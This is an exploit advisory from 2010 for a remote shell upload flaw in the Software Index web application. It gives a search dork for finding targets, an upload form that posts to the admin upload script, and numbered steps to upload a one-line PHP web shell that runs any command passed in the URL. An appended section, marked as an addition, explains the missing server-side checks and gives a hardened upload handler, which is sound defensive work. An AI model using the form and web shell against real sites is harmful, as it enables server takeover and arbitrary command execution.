
Software Index Remote Shell Upload

Posted Jun 17, 2010
Authored by indoushka

Software Index suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 2d0067968f0065e97e6da4b306cc5f1d9643146df438c33c200b85a8d992a88c

======================================================================= 

# Software Index (Remote File Upload) Exploit

=======================================================================

# >> Exploit database separated by exploit type (local, remote, DoS, etc.)

# [+] Site : Inj3ct0r.com

# [+] Support e-mail : submit[at]inj3ct0r.com

# I'm indoushka member from Inj3ct0r Team



########################################################################

# Vendor: http://www.p30vel.ir/

# Date: 2010-05-27

# Author : indoushka

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !

# Contact : indoushka@hotmail.com

# Home : www.arab-blackhat.co.cc

# Bug : Up

# Tested on : windows SP2 Français V.(Pnx2 2.0)
########################################################################

# Dork : Copyright 2010. Software Index

# Exploit By indoushka

<html>
<head>
<Title>Select Image File for uploading</Title>

<script language="JavaScript">
function checkFile()
{
if (form1.userfile.value == "")
{
alert(" Please choose a file to upload");
return (false);
}
if (form1.userfile.value.indexOf(".php") == -1 &&form1.userfile.value.indexOf(".png") == -1 &&form1.userfile.value.indexOf(".bmp") == -1 &&form1.userfile.value.indexOf(".jpeg") == -1 && form1.userfile.value.indexOf(".gif") == -1)
{
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();
return (false);
}
return(true);
}

</script>


</head>

<body>
<b><font size="3">Upload Image</font>.</b>
<FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);">
<input type="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>">
<input type="hidden" name="act" value="upload">
<table><tr><td>
<b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b>
<table>
<tr>
<td valign="top" width="15"><font color="#000000">1.</font></td>
<td width="470"><font color="#000000">To add an Attachment, click
the 'Browse' button to select the file to attach, or type the path
to the file in the Text-box below.</font></td>
</tr>
<tr>
<td valign="top" width="15"><font color="#000000">2.</font></td>
<td width="470"><font color="#000000">Then click Upload button to
complete the upload</font></td>
</tr>
<tr>
<td valign="top" width="15"><font color="#000000">3.</font></td>
<td width="470"><font color="#990000">NOTE</font><font color="#000000">:
The File transfer can take from a few seconds upto a few minutes
depending on the size of the attachment. Please be patient while
the attachment is being uploaded.</font></td>
</tr>
<tr>
<td valign="top" width="15"><font color="#000000">4.</font></td>
<td width="470"><font color="#990000">NOTE</font><font color="#000000">:
The File will be renamed if the file with the same name is present</font></td>
</tr>
</table>
</TD>
</TR>
<TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR>
<TR><TD><strong>Image</strong>
<INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
</TD></TR>
<TR><TD>&nbsp;</TD></TR>
<TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the
file is completely transferred.<BR><BR></TD></TR>
</table>

</FORM>


<!--
<Script Language="JavaScript">
function listattach(filename)
{
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()
}
</script>
<Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">
-->

</body>

</html>

1 - Save as php or html and upload to your localhost or server

2 - use Backdoor

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

3 - you see where the file uploaded

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------
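
The advisory's form posts straight to siteadmin/doupload.php, and its only file-type check is the browser-side checkFile(), which any client can alter or skip. As an added example (not the vendor's code and not part of the original advisory), a server-side handler for the same `userfile` field that enforces the image-only rule itself; the storage directory, the gate on `$_SESSION['username']` and the response format are assumptions.

```php
<?php
// Added example: server-side checks for the image upload. Assumptions:
// UPLOAD_DIR, the session gate and the responses are hypothetical.
session_start();

const UPLOAD_DIR = '/var/www/upload-store';  // hypothetical; outside the web root
const MAX_BYTES  = 1000000;                  // the limit the form advertises
const ALLOWED    = [                         // detected MIME type => stored extension
    'image/gif' => 'gif', 'image/jpeg' => 'jpg', 'image/png' => 'png',
    'image/bmp' => 'bmp', 'image/x-ms-bmp' => 'bmp',
];

function reject(int $status, string $msg): void
{
    http_response_code($status);
    exit($msg);
}

// 1. The endpoint sits under siteadmin/: require a logged-in session.
if (empty($_SESSION['username'])) {
    reject(403, 'Not authenticated');
}

// 2. Accept exactly one completed upload of bounded size.
$f = $_FILES['userfile'] ?? null;
if (!is_array($f) || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    reject(400, 'Upload failed');
}
if ($f['size'] <= 0 || $f['size'] > MAX_BYTES) {
    reject(413, 'File too large');
}

// 3. Decide the type from the content; the submitted name is never used.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if (!is_string($mime) || !array_key_exists($mime, ALLOWED)
    || @getimagesize($f['tmp_name']) === false) {
    reject(415, 'Only gif/jpg/png/bmp images are accepted');
}

// 4. Store under a random server-chosen name with a fixed extension.
$name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
if (!move_uploaded_file($f['tmp_name'], UPLOAD_DIR . '/' . $name)) {
    reject(500, 'Could not store file');
}
echo $name;
```

Serve the stored images from a location where script execution is disabled, so nothing in the upload directory is ever interpreted as PHP.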